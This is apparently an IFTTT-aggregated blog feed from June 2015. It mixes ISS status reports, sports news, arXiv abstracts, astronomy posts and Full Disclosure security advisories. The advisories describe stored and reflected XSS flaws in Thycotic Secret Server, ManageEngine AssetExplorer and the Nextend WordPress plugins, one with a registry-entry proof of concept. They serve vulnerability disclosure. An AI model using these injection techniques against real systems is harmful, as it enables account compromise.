Microbiome: Kelly collected samples in support of the Microbiome experiment which were then inserted into the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for later return. The Microbiome experiment investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time). To monitor the status of the crewmembers’ microbiome and immune system and their interaction with the unique environment of the ISS, periodic samples from different parts of the body and the surrounding ISS environment are taken. As part of this study, the likelihood and consequences of alterations in the microbiome due to extreme environments, and the related human health risk, will be assessed.

SUPVIS-E Troubleshooting: Kelly conducted a conference with SUPVIS-E specialists, then, with ground assistance, successfully performed troubleshooting on the laptop in an attempt to regain connectivity and allow proper communication between the laptop and ground. ESA ground controllers will continue with commanding and checkout of the laptop. SUPVIS-E aims at simulating selected future human exploration scenarios including immersive remote control of a robot by an astronaut in orbit around a target object (such as Mars or the Moon). A crew member will control the ESA test rover located at ESOC (Germany) in near real time.

SpaceX (SpX)-7 Preparations: Kelly and Padalka completed another session of On Board Training (OBT) with the robotics trainer to prepare for capture/berthing of the Dragon vehicle. Today they practiced a 30 meter approach and two capture point hold runs. SpX-7 launch is planned for Sunday, June 28 with berthing on Tuesday, June 30.

Today’s Planned Activities
All activities were completed unless otherwise noted.
SLEEP Questionnaire
Self-Reaction Test. Reaction Time Test (morning)
BIOME – Survey Completion
Biochemical Urine Test
URISYS Hardware Stowage
HRF. Sample MELFI Insertion
Intermodular TORU Test with Docked Progress 425 (AO)
PROBOY. RSЕ1 Laptop Ops.
PROBOY. Penetration Simulator Ops.
HMS Defibrillator Inspection
BIOME. Sample collection
HRF. Sample MELFI Insertion
BIOME – Equipment stowage after sample collection
WRM Ops
PROBOY. Copy and Downlink Data
MOTOCARD. Experiment Ops.
MOTOCARD. Assistance with the Experiment
WRS – Recycle Tank Fill
Vision Test
WRS – Recycle Tank Fill
Vision Test – Complete Questionnaire
Dragon Approach and Berthing OBT using ROBoT, Session 1
СОЖ Maintenance
WRS – Recycle Tank Fill
Mating umbilicals to ARIS
RGN REC-TNK – Removal of depress hose for nominal operations
SPLANH. Preparation for Experiment
WRS – Recycle Tank Fill
Self-Reaction Test. Reaction Time Test

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
OBT Dragon RoBOT
N2 Distribution System Leak Check [In Work]

Three-Day Look Ahead:
Thursday, 06/25: Ocular Health, Dragon OBT RoBOT, Sprint
Friday, 06/26: Crew off duty
Saturday, 06/27: Housekeeping, Crew off duty

QUICK ISS Status – Environmental Control Group:
Component – Status
Elektron – On
Vozdukh – Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”) – On
[СКВ] 2 – SM Air Conditioner System (“SKV2”) – Off
Carbon Dioxide Removal Assembly (CDRA) Lab – Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3 – Operate
Major Constituent Analyzer (MCA) Lab – Shutdown
Major Constituent Analyzer (MCA) Node 3 – Operate
Oxygen Generation Assembly (OGA) – Standby
Urine Processing Assembly (UPA) – Process
Trace Contaminant Control System (TCCS) Lab – Off
Trace Contaminant Control System (TCCS) Node 3 – Full Up

from ISS On-Orbit Status Report http://ift.tt/1eIZGSj
via IFTTT

Swiss champion Basel signs Austria forward Marc Janko

BASEL, Switzerland (AP) Swiss champion Basel says Austria forward Marc Janko has joined on a free transfer from Sydney.

from FOX Sports Digital http://ift.tt/1LELAf1
via IFTTT

Ajax signs defender John Heitinga on free transfer

AMSTERDAM (AP) John Heitinga is heading home to add some experience to Ajax's young defense.

from FOX Sports Digital http://ift.tt/1Gt3FsI
via IFTTT

Google Chrome Silently Listening to Your Private Conversations

Google came under fire for surreptitiously downloading and installing a Chrome extension that subsequently listened to the conversations of Chromium users without consent. After these accusations, a wave of criticism by privacy campaigners and open source developers led Google to remove the extension from Chromium, the open-source version of the Chrome browser. The extension in


from The Hacker News http://ift.tt/1SMXdop
via IFTTT

Abstinence, What is it?

Please consider making a donation to support Nicotine Anonymous World ... This is the official website for Nicotine Anonymous World Services.

from Google Alert - anonymous http://ift.tt/1CvoZw7
via IFTTT

Marseille accepts West Ham offer for Payet

MARSEILLE, France (AP) Marseille has reluctantly accepted an offer from Premier League club West Ham for France midfielder playmaker Dimitri Payet.

from FOX Sports Digital http://ift.tt/1BCFFqv
via IFTTT

Mind Blowing Radar-based Gesture Recognition Technology for Everything

Since it was introduced at the annual Google I/O conference, Project Soli has been trending on the Internet. Project Soli is one of Google's latest cutting-edge experiments that could actually transform the way humans interact with technology. Project Soli is not the wearable watch you might think it is. So what is Project Soli? It's you. Yes, you heard it right. Google's secretive


from The Hacker News http://ift.tt/1dhHsFZ
via IFTTT

Opposition: SAfrican soccer officials shielded from scrutiny

CAPE TOWN, South Africa (AP) South African soccer officials are being deliberately shielded from scrutiny over FIFA-related bribery allegations surrounding the country's successful 2010 World Cup bid, an opposition politician said Wednesday.

from FOX Sports Digital http://ift.tt/1TO7rX0
via IFTTT

Capturing Dark Matter with Black Holes

In this visualization, we plot the trajectories of a random distribution of hypothesized dark matter particles around a maximally-rotating black hole. The particles captured by the hole are seen collecting around the event horizon in the center, the particles experiencing stronger and stronger redshift, represented by the stronger red coloration of the particle trail. The ergosphere is represented by the bluish oblate spheroid shape around the spherical event horizon. Inside the ergosphere, the distortion of space is so strong that particles must be deflected and carried with the rotation of the black hole. Hence, while the particles are traveling in all different directions far from the black hole, we see them carried in the same direction close to the event horizon.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1BBWCRG
via IFTTT

Triple Conjunction Over Galician National Park


What are those bright objects hovering over the horizon? Planets -- and the Moon. First out, the horizon featured is a shoreline of the Atlantic Ocean that occurs at the Galicia National Park in northern Spain. Next furthest out, on the left, is the Moon. Easily the brightest object in the night sky, the Moon here was in only a crescent phase. The next furthest out, on the right, is the planet Venus, while planet Jupiter is seen at the top of the triangle. The long exposure from our rapidly rotating Earth made all of the celestial objects -- including the far distant stars -- appear as slight arcs. The featured image was taken last Sunday night. Although the Moon's orbit has now taken it away from this part of the sky, the planets Venus and Jupiter can be seen superposed just after sunset until mid-August. The closest apparent separation of Venus and Jupiter will occur in one week, when the two planets will appear separated by less than the angular diameter of the Moon. via NASA http://ift.tt/1fALvPa

Host Chile beats Uruguay to reach Copa America semifinals

SANTIAGO, Chile (AP) Chile's hopes of winning its home Copa America sharply improved with a 1-0 win over defending champion Uruguay on Wednesday.

from FOX Sports Digital http://ift.tt/1Lw1QC3
via IFTTT

Wednesday, June 24, 2015

Host Chile beats Uruguay 1-0 to reach Copa America semis

SANTIAGO, Chile (AP) Chile's hopes of winning its home Copa America were kept alive Wednesday thanks to a 1-0 win over defending champion Uruguay.

from FOX Sports Digital http://ift.tt/1GJbEo6
via IFTTT

Orioles Video: Bud Norris falls to 2-6, allows 5 unearned runs over 5.2 IP in loss to Red Sox; Chris Davis RBI single (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


About History
Historical Facts That Sound Like Huge Lies But Are Actually True...


Following: 2315 - Followers: 2146

June 24, 2015 at 11:03PM via Twitter http://twitter.com/Historyyfacts

[FD] CVE-2015-3443 XSS in Thycotic Secret Server version 8.6.000000 to 8.8.000004

#############################################################
#
# COMPASS SECURITY ADVISORY
# http://ift.tt/JChVZk
#
#############################################################
#
# CVE ID : CVE-2015-3443
# Product: Secret Server [1]
# Vendor: Thycotic
# Subject: Stored Cross-Site Scripting Vulnerability (XSS)
# Risk: High
# Effect: Remotely exploitable
# Author: Marco Delai (marco.delai@csnc.ch)
# Date: June 24th 2015
#
#############################################################

Introduction:

Source: Gmail -> IFTTT-> Blogger

[FD] Securing SAP Systems from XSS vulnerabilities Part 2: Defense for SAP NetWeaver ABAP

Host Chile beats Uruguay to reach Copa America semifinals

SANTIAGO, Chile (AP) Defender Mauricio Isla scored in the 81st minute to help host Chile defeat defending champion Uruguay 1-0 and advance to the semifinals of the Copa America.

from FOX Sports Digital http://ift.tt/1Jk31UO
via IFTTT

Leverage Financial News to Predict Stock Price Movements Using Word Embeddings and Deep Neural Networks. (arXiv:1506.07220v1 [cs.CE])

Financial news contains useful information on public companies and the market. In this paper we apply the popular word embedding methods and deep neural networks to leverage financial news to predict stock price movements in the market. Experimental results have shown that our proposed methods are simple but very effective, which can significantly improve the stock prediction accuracy on a standard financial database over the baseline system using only the historical price information.



from cs.AI updates on arXiv.org http://ift.tt/1e4jluW
via IFTTT

Sequential Extensions of Causal and Evidential Decision Theory. (arXiv:1506.07359v1 [cs.AI])

Moving beyond the dualistic view in AI where agent and environment are separated incurs new challenges for decision making, as calculation of expected utility is no longer straightforward. The non-dualistic decision theory literature is split between causal decision theory and evidential decision theory. We extend these decision algorithms to the sequential setting where the agent alternates between taking actions and observing their consequences. We find that evidential decision theory has two natural extensions while causal decision theory only has one.



from cs.AI updates on arXiv.org http://ift.tt/1e4joqC
via IFTTT

Parallel Multi-Dimensional LSTM, With Application to Fast Biomedical Volumetric Image Segmentation. (arXiv:1506.07452v1 [cs.CV])

Convolutional Neural Networks (CNNs) can be shifted across 2D images or 3D videos to segment them. They have a fixed input size and typically perceive only small local contexts of the pixels to be classified as foreground or background. In contrast, Multi-Dimensional Recurrent NNs (MD-RNNs) can perceive the entire spatio-temporal context of each pixel in a few sweeps through all pixels, especially when the RNN is a Long Short-Term Memory (LSTM). Despite these theoretical advantages, however, unlike CNNs, previous MD-LSTM variants were hard to parallelize on GPUs. Here we re-arrange the traditional cuboid order of computations in MD-LSTM in pyramidal fashion. The resulting PyraMiD-LSTM is easy to parallelize, especially for 3D data such as stacks of brain slice images. PyraMiD-LSTM achieved best known pixel-wise brain image segmentation results on MRBrainS13 (and competitive results on EM-ISBI12).



from cs.AI updates on arXiv.org http://ift.tt/1e4joqA
via IFTTT

Objective Variables for Probabilistic Revenue Maximization in Second-Price Auctions with Reserve. (arXiv:1506.07504v1 [stat.ML])

Many online companies sell advertisement space in second-price auctions with reserve. In this paper, we develop a probabilistic method to learn a profitable strategy to set the reserve price. We use historical auction data with features to fit a predictor of the best reserve price. This problem is delicate - the structure of the auction is such that a reserve price set too high is much worse than a reserve price set too low. To address this we develop objective variables, a new framework for combining probabilistic modeling with optimal decision-making. Objective variables are "hallucinated observations" that transform the revenue maximization task into a regularized maximum likelihood estimation problem, which we solve with an EM algorithm. This framework enables a variety of prediction mechanisms to set the reserve price. As examples, we study objective variable methods with regression, kernelized regression, and neural networks on simulated and real data. Our methods outperform previous approaches both in terms of scalability and profit.



from cs.AI updates on arXiv.org http://ift.tt/1BBzy5y
via IFTTT

Improve Anonymous Submissions - Graded Survey/Quiz

I would like to request an improvement to the Anonymous Submissions option within the Graded Survey feature when creating a new Quiz. Currently ...

from Google Alert - anonymous http://ift.tt/1QQSLYb
via IFTTT

Allow any anonymous user to automatically become registered and logged in without a form entry ...

Might as well go whole-hog and allow an anonymous user to just become temporarily registered and un-registered without ever seeing any form at all.

from Google Alert - anonymous http://ift.tt/1QQSLY9
via IFTTT

Opposition: SAfrican soccer officials shielded from scrutiny

CAPE TOWN, South Africa (AP) South Africa's main opposition party says the country's soccer officials are being shielded from scrutiny over bribery allegations surrounding the successful 2010 World Cup bid.

from FOX Sports Digital http://ift.tt/1GzbDzO
via IFTTT

Gamblers' Anonymous is a poor substitute – we need a serious treatment response for gambling ...

I spoke on BBC Radio Wales recently to discuss my former addiction to FOBTs. I was joined by ex-Wales international footballer John Hartson, who ...

from Google Alert - anonymous http://ift.tt/1Iex9zl
via IFTTT

Ravens: Jamison Hensley assigns letter grade to team's offseason; identifies best (DBs) and riskiest (Perriman) moves (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous User Password Creation on Checkout

Was wondering if anyone has had success with allowing users to create a password with their account when checking out. I've tried a couple solutions ...

from Google Alert - anonymous http://ift.tt/1CtjaiR
via IFTTT

[FD] ROP 101 Blog

Hi List,

FYI - This is a post for the n00bs in the audience. If you already know how to chain together gadgets to form a ROP chain and get a shell, this post is not for you. I know there are some on the list who could benefit by a better understanding of ROP so:

http://ift.tt/1FAaXcv

The target binary/VM as well as some other info is available from the VulnHub page:
http://ift.tt/1JiPGff

Slides from the BSides London workshop are here:
http://ift.tt/1IyLDWw

Best Regards,
Craig Young
Security Researcher, Tripwire VERT
@CraigTweets

Source: Gmail -> IFTTT-> Blogger

Capello survives meeting of Russian football leadership

MOSCOW (AP) Fabio Capello survived a crucial meeting of the Russian Football Union's executive committee on Wednesday amid widespread speculation the national coach would be fired, but faces talks on his future.

from FOX Sports Digital http://ift.tt/1CsKUnO
via IFTTT

Brazil striker Firmino joins Liverpool from Hoffenheim

LIVERPOOL, England (AP) Brazil forward Roberto Firmino joined Liverpool from German side Hoffenheim on Wednesday for a reported fee of 29 million pounds ($45.8 million) that would make him the second most expensive player in the English club's history.

from FOX Sports Digital http://ift.tt/1Hdxljk
via IFTTT

ISS Daily Summary Report – 06/23/15

Binary Colloidal Alloy Test Low Gravity Phase Kinetics Platform (BCAT-KP): Kelly changed the camera battery, transferred images to a laptop for downlink, and set the D2Xs intervalometer. The BCAT-KP experiment aims to help materials scientists develop new consumer products with unique properties and longer shelf lives. Colloids are mixtures of small particles distributed throughout a liquid, which include milk, detergents and liquid crystals. Gravity affects how the particles clump together and sink, making the ISS an ideal platform to study their fundamental behaviors.

Microbiome Setup: Kelly gathered and reviewed a reminder video prior to beginning his next round of Microbiome collections. The Microbiome experiment investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time). To monitor the status of the crewmembers’ microbiome and immune system and their interaction with the unique environment of the ISS, periodic samples from different parts of the body and the surrounding ISS environment are taken. As part of this study, the likelihood and consequences of alterations in the microbiome due to extreme environments, and the related human health risk, will be assessed.

Mobile Servicing System (MSS) Operations: Robotics Ground Controllers powered up the MSS in the Hot Backup Configuration in preparation for today’s SpX-7 Offset Grapple practice session. During the MSS power up they also performed the pre-launch checkouts. Kelly and Padalka practiced maneuvering the Space Station Remote Manipulator System (SSRMS) into the grapple envelope of the Special Purpose Dexterous Manipulator (SPDM) Power Data Grapple Fixture (PDGF). They performed this eight times followed by a final run during which ground controllers safed the SSRMS to simulate a failure. The crew recovered by switching from the Cupola Robotic Workstation (RWS) to the Lab RWS and backed the SSRMS away.

Today’s Planned Activities
All activities were completed unless otherwise noted.
Micro-purification Unit cartridge F2 regeneration (start)
SLEEP questionnaire
RSS1,2 reboot
[ВКС] laptops antivirus software update
WRS – fill for processing from EDV
PROBOI. The activity with on-board laptop RSЕ1.
PROBOI. Ops with penetration simulator.
BIOME questionnaire
EHS water purification system sample collection
TOCA – PWD water sample analysis
PHS hardware setup
PROBOI. Data copy and downlink
HMS- PHS
СОЖ Maintenance
PHS data entry hardware stow
MOTOKARD payload ops.
RWS activation
CALCIUM payload session #9.
Cable КСПЭ SM-FOTO-D3-03 audit
ECLSS vessel transfer and R&R
Dragon capture OBT #1
Progress rendezvous monitoring tagup
Cleaning panel vent screens of FGB interior panels (pan. 201, 301, 401)
OBT – SSRMS OBT debrief
TOCA data recording
WRS – water sample analysis
PAO equipment prep
BCAT- Image transfer from video camera
Crew prep for PAO
PAO
Robotics Work Station (RWS) Display and Control Panel (DCP) Checkout
URISYS hardware prep
IMS update
BIOME – prep for sample draw
TOCA – data recording
Micro-purification Unit cartridge F2 regeneration (end)

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
OBT Dragon offset grapple

Three-Day Look Ahead:
Wednesday, 06/24: Dragon OBT RoBOT, Biome
Thursday, 06/25: Ocular Health, Dragon OBT RoBOT, Sprint
Friday, 06/26: Crew off duty for work planned on Saturday

QUICK ISS Status – Environmental Control Group:
Component – Status
Elektron – On
Vozdukh – Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”) – On
[СКВ] 2 – SM Air Conditioner System (“SKV2”) – Off
Carbon Dioxide Removal Assembly (CDRA) Lab – Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3 – Operate
Major Constituent Analyzer (MCA) Lab – Shutdown
Major Constituent Analyzer (MCA) Node 3 – Operate
Oxygen Generation Assembly (OGA) – Standby
Urine Processing Assembly (UPA) – Standby
Trace Contaminant Control System (TCCS) Lab – Off
Trace Contaminant Control System (TCCS) Node 3 – Full Up

from ISS On-Orbit Status Report http://ift.tt/1eHfZio
via IFTTT

'Undo Send' — How to Unsend Emails in Gmail

Sending an important and confidential email to a friend and mistakenly clicking send to someone else: this is something every one of us has experienced at some point. When we accidentally hit the reply-all button, send an email to the wrong person, or forget to attach a file, we are left only with an instant pang of regret. It feels like there is no going back.


from The Hacker News http://ift.tt/1BAl3yW
via IFTTT

Creator of Blackshades Malware Jailed 4 Years in New York

A Swedish man who was the mastermind behind the $40 BlackShades Remote Access Tool (RAT) that infected over half a million systems around the world was sentenced to almost five years in a U.S. prison on Tuesday. Alex Yücel, 25, owned and operated an organization called "BlackShades" that sold a sophisticated and notorious form of software, called a RAT, to several thousand hackers and


from The Hacker News http://ift.tt/1GHmlau
via IFTTT

Senegal rewards U20 World Cup semifinalists with over $400K

DAKAR, Senegal (AP) The Senegal government says it will reward the under-20 soccer squad with over $400,000 for reaching the semifinals in its first appearance at the World Cup.

from FOX Sports Digital http://ift.tt/1Iyilr9
via IFTTT

Sharpless 308: Star Bubble


Blown by fast winds from a hot, massive star, this cosmic bubble is huge. Cataloged as Sharpless 2-308 it lies some 5,200 light-years away toward the constellation of the Big Dog (Canis Major) and covers slightly more of the sky than a Full Moon. That corresponds to a diameter of 60 light-years at its estimated distance. The massive star that created the bubble, a Wolf-Rayet star, is the bright one near the center of the nebula. Wolf-Rayet stars have over 20 times the mass of the Sun and are thought to be in a brief, pre-supernova phase of massive star evolution. Fast winds from this Wolf-Rayet star create the bubble-shaped nebula as they sweep up slower moving material from an earlier phase of evolution. The windblown nebula has an age of about 70,000 years. Relatively faint emission captured in the expansive image is dominated by the glow of ionized oxygen atoms mapped to a blue hue. via NASA http://ift.tt/1NgD9aH

Tuesday, June 23, 2015

Ocean City, MD's surf is at least 6.12ft high

Maryland-Delaware, June 28, 2015 at 04:00AM

Ocean City, MD Summary
At 4:00 AM, surf min of 6.12ft. At 10:00 AM, surf min of 5.02ft. At 4:00 PM, surf min of 4.42ft. At 10:00 PM, surf min of 4.02ft.

Surf maximum: 7.13ft (2.17m)
Surf minimum: 6.12ft (1.87m)
Tide height: 2.79ft (0.85m)
Wind direction: NE
Wind speed: 22.51 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Orioles Highlight: David Lough hits 3-run HR, Ubaldo Jimenez (3 ER in 5 IP) in 6-3 victory over Red Sox (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Match fixer's accomplice sentenced to 34 months in jail

SINGAPORE (AP) Singapore media is reporting an accomplice of football match-fixer Wilson Raj Perumal has been sentenced to almost three years in jail for passport fraud.

from FOX Sports Digital http://ift.tt/1IcYbXJ
via IFTTT

On Available Corpora for Empirical Methods in Vision & Language. (arXiv:1506.06833v1 [cs.CL])

Integrating vision and language has long been a dream in work on artificial intelligence (AI). In the past two years, we have witnessed an explosion of work that brings together vision and language from images to videos and beyond. The available corpora have played a crucial role in advancing this area of research. In this paper, we propose a set of quality metrics for evaluating and analyzing the vision & language datasets and classify them accordingly. Our analyses show that the most recent datasets have been using more complex language and more abstract concepts; however, there are different strengths and weaknesses in each.



from cs.AI updates on arXiv.org http://ift.tt/1N7Wnij
via IFTTT

Scientific Discovery by Machine Intelligence: A New Avenue for Drug Research. (arXiv:1506.07116v1 [cs.AI])

The majority of big data is unstructured and of this majority the largest chunk is text. While data mining techniques are well developed and standardized for structured, numerical data, the realm of unstructured data is still largely unexplored. The general focus lies on information extraction, which attempts to retrieve known information from text. The Holy Grail, however is knowledge discovery, where machines are expected to unearth entirely new facts and relations that were not previously known by any human expert. Indeed, understanding the meaning of text is often considered as one of the main characteristics of human intelligence. The ultimate goal of semantic artificial intelligence is to devise software that can understand the meaning of free text, at least in the practical sense of providing new, actionable information condensed out of a body of documents. As a stepping stone on the road to this vision I will introduce a totally new approach to drug research, namely that of identifying relevant information by employing a self-organizing semantic engine to text mine large repositories of biomedical research papers, a technique pioneered by Merck with the InfoCodex software. I will describe the methodology and a first successful experiment for the discovery of new biomarkers and phenotypes for diabetes and obesity on the basis of PubMed abstracts, public clinical trials and Merck internal documents. The reported approach shows much promise and has potential to impact fundamentally pharmaceutical research as a way to shorten time-to-market of novel drugs, and for early recognition of dead ends.



from cs.AI updates on arXiv.org http://ift.tt/1fyR8gU
via IFTTT

Prefix-Projection Global Constraint for Sequential Pattern Mining. (arXiv:1504.07877v2 [cs.AI] UPDATED)

Sequential pattern mining under constraints is a challenging data mining task. Many efficient ad hoc methods have been developed for mining sequential patterns, but they all suffer from a lack of genericity. Recent works have investigated Constraint Programming (CP) methods, but they are still not effective because of their encoding. In this paper, we propose a global constraint based on the projected databases principle which remedies this drawback. Experiments show that our approach clearly outperforms CP approaches and competes well with ad hoc methods on large datasets.



from cs.AI updates on arXiv.org http://ift.tt/1Erdg4D
via IFTTT

South American football body may use reserve fund

SANTIAGO, Chile (AP) South American football's governing body may be forced to use a $10 million reserve fund to pay ongoing costs due to a cash-flow problem created by the FIFA bribery scandal.

from FOX Sports Digital http://ift.tt/1LkvNUK
via IFTTT

I have a new follower on Twitter


Jwliɑn☠†
Mis demonios internos, son mis peores enemigos...


Following: 809 - Followers: 890

June 23, 2015 at 07:46PM via Twitter http://twitter.com/EseTalJuli

I have a new follower on Twitter


Williemae Hayes
Don't forget Mother's Day. Or as they call it in Beverly Hills; Dad's Third Wife Day.


Following: 143 - Followers: 533

June 23, 2015 at 05:38PM via Twitter http://twitter.com/whheh86

Rivaldo ends retirement to play for his own team in Brazil

SAO PAULO (AP) Former star Rivaldo says he is ending his retirement and will start training again with Mogi Mirim, a second division team in the Brazilian league where he is the club president.

from FOX Sports Digital http://ift.tt/1GnNxZF
via IFTTT

[FD] Haka v0.3.0 release

Hey list,

A new version (0.3.0) of Haka is available at haka-security.org. The new release adds a stream-based asm instruction disassembler module based on the Capstone engine. This makes it possible, for instance, to detect obfuscated shellcode at the network level. The new version also improves logging performance and fixes various bugs. Thanks to all users who have reported these bugs.

As a reminder, Haka is an open source security oriented language that allows you to:
* write fine-grained security rules and set up complex mitigation scenarios.
* write text-based and binary-based protocol dissectors.

The Haka language is embedded into a modular framework allowing end-users to apply protocol dissection and security rule evaluation on live captured traffic.

Regards,
* http://ift.tt/Wa41EO
* https://twitter.com/hakasecurity
* http://ift.tt/1CdYONE

Source: Gmail -> IFTTT-> Blogger

[FD] XSS vulnerability in manage engine.

Title:
===============
ManageEngine Asset Explorer v6.1 - XSS Vulnerability

CVE-ID:
====================================
CVE-2015-2169

CVSS:
====================================
3.5

Product & Service Introduction (Taken from their homepage):
====================================
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM) software that helps you monitor and manage assets in your network from Planning phase to Disposal phase. AssetExplorer provides you with a number of ways to ensure discovery of all the assets in your network. You can manage software & hardware assets, ensure software license compliance and track purchase orders & contracts - the whole nine yards! AssetExplorer is very easy to install and works right out of the box. (Homepage: http://ift.tt/1QnQiAD )

Abstract Advisory Information:
==============================
A cross site scripting attack can be performed on the ManageEngine Asset Explorer. If the 'publisher' name contains a malicious script, it gets executed in the browser.

Affected Products:
====================
ManageEngine Product: Asset Explorer - Web Application 6.1.0 (Build 6112)

Severity Level:
====================
Medium

Technical Details & Description:
================================
Add a vendor with a script in it to the registry. Log in to the product and scan the endpoint where the registry was modified. In the right pane, go to Software -> Scanned Software. The script gets executed.

Vulnerable Product(s): ManageEngine Asset Explorer
Affected Version(s): Version 6.1.0 / Build Number 6112 (earlier versions I did not test)
Vulnerability Type(s): Persistent Cross Site Scripting

PoC:
=======================
Add the following registry entry on the machine, for a targeted attack.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"=""

Security Risk:
==================
Medium.

Credits & Authors:
==================
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)

Timeline:
==================
Discovered at Wed, March 3, 2015
Informed ManageEngine about the vulnerability: March 4, 2015
Case moved to development team: March 4, 2015
Asked for updates: March 9, 2015
Asked for updates: March 13, 2015
Asked for updates: April 14, 2015
Public Disclosure at Mon, June 22, 2015

Source: Gmail -> IFTTT-> Blogger

[FD] Minds.com - Several Issues

The Hype
========

Before we begin, let's look at some of the hype that the Minds.com team has been feeding into on Twitter.

https://twitter.com/minds/status/611536729175130112 ~>
> #Anonymous backs new #encrypted #social network to rival Facebook http://ift.tt/1Sou16Y #minds #opensource #freedom #algorithm

https://twitter.com/minds/status/612023517962477568 ~>
> Anonymous Is Championing a Social Network That Has One Major Advantage Over Facebook by @maxplenke http://ift.tt/1GoTepd … via @MicNews

https://twitter.com/minds/status/610499794834821121 ~>
> #Anonymous is supporting a new privacy-focused #social network that takes aim at Facebook's shady practices http://read.bi/1cW4uSz via @sai

https://twitter.com/WiredUK/status/610732859373043712 ~>
> Anonymous backs encrypted social network 'Minds' http://wired.uk/8TxXRq

Wow, if Anonymous backs this project, surely it must be legitimate and secure, right?

The Reality
===========

Prior Work by VoidSec

Source: Gmail -> IFTTT-> Blogger

[FD] New version: smalisca - Static Code Analysis tool for Smali files

Hi,

We released version 0.2 of smalisca.

[ DESCRIPTION ]

A static code analysis tool for Smali files. If you have ever looked at Android applications, you know to appreciate the ability to analyze your target at the most advanced level. Dynamic program analysis will give you a pretty good overview of your application's activities and general behaviour. However, sometimes you'll want to just analyze your application without running it. You'll want to have a look at its components, analyze how they interact and how data is tainted from one point to another.

[ DOWNLOAD ]

http://ift.tt/1CThFwh

[ NOTES ]

* open pull requests for bug reports / whatever on: http://ift.tt/1E08xYU or send direct email to cyneox[at]nullsecurity.net / team[at]nullsecurity.net

Cheers,
noptrix

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-4557 - Wordpress “Nextend Twitter Connect” & “Nextend Google Connect” Cross Site Scripting

Wordpress “Nextend Twitter Connect”
===================================

Document Title:
===============
WordPress “Nextend Twitter Connect” Plugin Version 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)

Download URL:
=============
http://ift.tt/14v5QQx

Release Date:
=============
2015-06-20

Vulnerability CVE ID:
=====================
CVE-2015-4557

Vulnerability Disclosure Timeline:
==================================
2015-06-15 First notified WordPress.
2015-06-15 First notified plugin vendor.
2015-06-15 First notified Mitre for CVE number.
2015-06-16 Vendor published update for the plugin.
2015-06-22 Public Disclosure.

Discovery Status:
=================
Published

Severity Level:
===============
High

Technical Details, Description & Proof of Concept (PoC):
========================================================
After installing WordPress I added the plugin "Nextend Twitter Connect", which allows you to log in to WordPress with a Twitter account. During my test I found out that the “redirect_to” parameter is vulnerable to a Reflected XSS attack.
http://ift.tt/1Lsioe0

To reach the root of the problem, I took a look at the plugin source code and realized that the problem is in “new_Twitter_sign_button”, which is located in the file “nextend-Twitter-connect.php”. The problematic function is located at line 492:
http://ift.tt/1GFDOjJ

As you can see at line 492, the function doesn't escape HTML tags or other dangerous symbols. When an attacker injects JavaScript code in the URL, the function runs the code, as you can see:
http://ift.tt/1Lsioe2
And pops the alert window.

Solution - Fix & Patch:
=======================
In order to solve this security flaw you need to add the “htmlentities” function.
(http://ift.tt/11pVKOE)
As you can see in the image:
http://ift.tt/1GFDOjL

Wordpress “Nextend Google Connect”
===================================

Document Title:
===============
WordPress “Nextend Google Connect” Plugin Version 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)

Download URL:
=============
http://ift.tt/1Lsimmr

Release Date:
=============
2015-06-20

Vulnerability CVE ID:
=====================
CVE-2015-4557

Vulnerability Disclosure Timeline:
==================================
2015-06-15 First notified WordPress.
2015-06-15 First notified plugin vendor.
2015-06-15 First notified Mitre for CVE number.
2015-06-16 Vendor published update for the plugin.
2015-06-22 Public Disclosure.

Discovery Status:
=================
Published

Severity Level:
===============
High

Technical Details, Description & Proof of Concept (PoC):
========================================================
After installing WordPress I added the plugin "Nextend Google Connect", which allows you to log in to WordPress with a Google account. During my test I found out that the “redirect_to” parameter is vulnerable to a Reflected XSS attack.
http://ift.tt/1GFDQIs

To reach the root of the problem, I took a look at the plugin source code and realized that the problem is in “new_google_sign_button”, which is located in the file “nextend-Google-connect.php”. The problematic function is located at line 433:
http://ift.tt/1Lsimmv

As you can see at line 433, the function doesn't escape HTML tags or other dangerous symbols. When an attacker injects JavaScript code in the URL, the function runs the code, as you can see:
http://ift.tt/1GFDOjN
And pops the alert window.

Solution - Fix & Patch:
=======================
In order to solve this security flaw you need to add the “htmlentities” function.
(http://ift.tt/11pVKOE)
As you can see in the image:
http://ift.tt/1Lsioea

Liran Segal (Bugsec Information Security LTD)

Regards,
Liran Segal
Penetration Testing
BugSec Cyber & Information Security

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2015-4413 - Wordpress “Nextend Facebook Connect” Cross Site Scripting

Document Title:
===============
WordPress “Nextend Facebook Connect” Plugin Version 1.5.4 is vulnerable to Reflected XSS (Cross Site Scripting)

Download URL:
=============
http://ift.tt/1z6w2uA

Release Date:
=============
2015-06-20

Vulnerability CVE ID:
=====================
CVE-2015-4413

Vulnerability Disclosure Timeline:
==================================
2015-06-03 First notified WordPress.
2015-06-07 First notified plugin vendor.
2015-06-10 First notified Mitre for CVE number.
2015-06-11 Vendor published update for the plugin.
2015-06-22 Public Disclosure.

Discovery Status:
=================
Published

Severity Level:
===============
High

Technical Details, Description & Proof of Concept (PoC):
========================================================
